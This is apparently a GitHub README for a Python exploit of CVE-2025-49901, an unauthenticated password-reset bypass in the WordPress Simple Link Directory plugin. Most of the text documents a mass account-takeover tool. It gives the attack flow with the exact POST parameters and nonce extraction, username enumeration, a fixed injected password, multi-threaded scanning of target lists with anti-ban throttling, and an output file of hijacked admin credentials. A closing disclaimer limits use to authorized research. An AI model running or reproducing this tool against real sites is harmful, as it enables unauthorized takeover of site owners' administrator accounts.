Nxploited/CVE-2025-49901

# CVE-2025-49901 WordPress Simple Link Directory Plugin < 14.8.1 存在高优先级的 Broken Authentication 漏洞 ``` ╔═══════════════════════════════════════════════════════════════════╗ ║ CVE-2025-49901 · Simple Link Directory · qc-opd ║ ║ Authentication Bypass → Password Reset → RCE ║ ╚═══════════════════════════════════════════════════════════════════╝ ```       ## ▸ 漏洞详情 | | | |---|---| | **CVE** | CVE-2025-49901 | | **CVSS** | **9.8 CRITICAL** — `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **ADP** | CISA-ADP | | **插件** | quantumcloud Simple Link Directory (`qc-simple-link-directory`) | | **受影响版本** | 所有版本 **< 14.8.1** | | **认证要求** | **无需认证** | | **漏洞类型** | 通过备用路径的认证绕过（CWE-288） | | **CWE** | CWE-288 · 使用备用路径或通道进行认证绕过 | `qc-opd` 密码重置表单在 SLD 页面上暴露，接受用户名和新密码，但未通过任何令牌、电子邮件确认或权限检查来验证用户身份。未经授权的攻击者可以枚举 WordPress 用户名，提交任意账户的重置表单，并立即使用注入的密码进行身份验证——从而无需与目标用户交互即可获得管理员权限。 ## ▸ 攻击流程 ``` ┌─────────────────────────────────────────────────────────┐ │ 1. Locate SLD reset page │ │ Probe 28+ paths → match: "sld" + "_wpnonce" + form │ │ │ │ 2. Extract nonce │ │ Parse _wpnonce from HTML / JS / qc-opd-nonce │ │ │ │ 3. Enumerate usernames │ │ /?author=1..10 + /wp-json/wp/v2/users + hostname │ │ │ │ 4. Reset password for each username │ │ POST qc-restore-pwd=restore │ │ qc-uid= │ │ pass=newhackerpass123 │ │ _wpnonce= │ │ │ │ 5. Verify access (dual mode) │ │ Session mode → cookie check + /wp-admin/ probes │ │ Password mode → wp-login.php + admin panel check │ │ │ │ 6. Write confirmed hits → scan_results/reset_mass_success.txt │ └─────────────────────────────────────────────────────────┘ ``` ## ▸ 环境搭建 ``` git clone https://github.com/Nxploited/CVE-2025-49901.git cd CVE-2025-49901 pip install requests colorama urllib3 python3 CVE-2025-49901.py ``` **`requirements.txt`** ``` requests>=2.28.0 colorama>=0.4.6 urllib3>=1.26.0 ``` ## ▸ 使用方法 ``` Targets list file → list.txt (one host per line) Threads → default 5 HTTP timeout → default 10s Per-user delay MIN/MAX → anti-ban throttle (default 0.3 / 0.7s) Delay between sites → default 1.0s Output file → scan_results/reset_mass_success.txt ``` **目标格式：** ``` https://target1.com target2.com http://target3.com/wordpress ``` **为所有重置注入的固定密码：** ``` newhackerpass123 ``` ## ▸ 用户名枚举来源 | 方法 | 端点 | |---|---| | 作者重定向 | `/?author=1` → `/?author=10` | | REST API | `/wp-json/wp/v2/users` | | 主机名 | 域名的第一个标签作为后备 | | 硬编码 | 始终包含 `admin` | ## ▸ 管理员验证逻辑 每次重置尝试后，工具使用 **两种独立方法** 验证管理员访问权限： ``` Session mode → checks wordpress_logged_in cookie + /wp-admin/ indicators Password mode → full wp-login.php POST + multi-path admin panel probe ``` 检查的管理员指示器： ``` id="adminmenu" · id="wpadminbar" · id="wpwrap" users.php · plugins.php · plugin-install-tab · upload-plugin ``` ## ▸ 终端输出格式 ``` [HH:MM:SS] [https://target.com] NONCE: OK | RESET: OK | ACCESS: 1 HIT [HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: - | ACCESS: 0 HIT ``` ## ▸ 输出文件 **`scan_results/reset_mass_success.txt`** ``` [2025-06-01T14:22:10] https://target.com - account=admin pass=newhackerpass123 mode=password [2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123 mode=session ``` ## ▸ 作者 ``` Nxploited (Khaled Alenazi) GitHub → https://github.com/Nxploited Telegram → @KNxploited ``` [](https://github.com/Nxploited) [](https://t.me/KNxploited) ## ▸ 免责声明 ``` FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY. The author bears no responsibility for use against systems the operator does not own or have explicit written permission to test. Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide. You alone are responsible for your actions. ``` _{© 2025 Nxploited · Simple Link Directory < 14.8.1 · 已在 14.8.1 中修复}

标签：Alternate Path Authentication, Broken Authentication, CRITICAL, CVE-2025-49901, CVSS 9.8, CWE-288, Python, qc-opd, qc-simple-link-directory, RCE风险, Simple Link Directory, StruQ, WordPress, WordPress插件, 反取证, 安全评估, 密码重置绕过, 插件漏洞, 无后门, 无认证要求, 未授权访问, 漏洞披露, 认证绕过, 身份验证绕过, 逆向工具